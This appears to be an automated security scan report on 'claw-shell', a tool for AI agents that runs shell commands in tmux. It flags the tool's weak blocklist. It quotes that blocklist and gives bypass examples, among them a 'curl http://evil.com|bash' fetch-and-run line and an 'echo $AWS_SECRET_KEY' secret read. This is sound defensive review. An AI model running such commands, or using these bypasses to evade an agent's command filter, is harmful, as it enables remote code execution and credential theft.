Suspicious — Risk Score 48/100
Last scan: 1 day ago
claw-shell
Run shell commands inside tmux session for AI agent interaction
Shell execution tool with declared purpose but weak safety filter that can be bypassed, allowing potentially destructive commands.
Skill Name: claw-shell
Duration: 34.6s
Engine: pi
Use with caution
Add more comprehensive command validation, use allowlist approach instead of blocklist, add timeout limits, and consider sandboxing tmux session.

Findings 4 items

Severity Finding Location
High
Unrestricted shell execution with weak safety controls (RCE)
The skill uses execSync to execute arbitrary shell commands with only a basic blocklist filter. The filter in isDangerous() can be bypassed with variations like 'rmdir', uppercase commands, or piped remote scripts.
const bad = ['sudo', ' rm ', ' rm-', 'reboot', 'shutdown', 'mkfs', 'dd '];
→ Implement allowlist approach for commands or use more comprehensive validation. Add command timeouts and resource limits.
handler.js:18
Medium
Dangerous commands bypass filter (RCE)
Commands like 'rmdir', 'chmod 777', '> file' redirection, or 'curl http://evil.com|bash' are not blocked by the current filter.
const bad = ['sudo', ' rm ', ' rm-', 'reboot', 'shutdown', 'mkfs', 'dd '];
→ Add coverage for more dangerous operations including file permissions, network downloads, and recursive deletion.
handler.js:18
Medium
Indirect environment variable access (Sensitive Access)
While the skill does not explicitly access the environment, the shell execution allows reading $API_KEY, $SECRET, etc. via commands like 'echo $AWS_SECRET_KEY'.
execSync(`tmux send-keys -t claw "${escaped}" C-m`);
→ Consider sanitizing commands that query environment variables or restrict to specific paths.
handler.js:14
Low
No command timeout configured (RCE)
execSync calls have no timeout specified, allowing commands to hang indefinitely.
await new Promise(r => setTimeout(r, 500));
→ Add timeout option to execSync calls.
handler.js:29
Resource Declared Inferred Status Evidence
Shell WRITE WRITE ✓ Aligned execSync used in handler.js:1,7,10
Filesystem WRITE WRITE ✓ Aligned Shell can execute any file operation
Network WRITE WRITE ✓ Aligned Shell can execute curl/wget/netcat
Environment NONE READ ✓ Aligned Shell commands can read $ENV vars
Clipboard NONE NONE
Browser NONE NONE
Database NONE NONE
1 findings
Medium External URL
https://x.com/...
SKILL.md:39

File Tree

3 files · 2.4 KB · 106 lines
JavaScript 1f · 57L Markdown 1f · 44L JSON 1f · 5L
├─ 📋 _meta.json JSON 5L · 129 B
├─ 📜 handler.js JavaScript 57L · 1.4 KB
└─ 📝 SKILL.md Markdown 44L · 928 B

Security Positives

✓ Purpose and capabilities are clearly documented in SKILL.md
✓ Uses dedicated tmux session 'claw' for isolation
✓ Basic safety filter exists for clearly dangerous commands
✓ No hidden functionality or obfuscation detected
✓ No credential harvesting or data exfiltration observed
✓ Single-purpose tool with focused functionality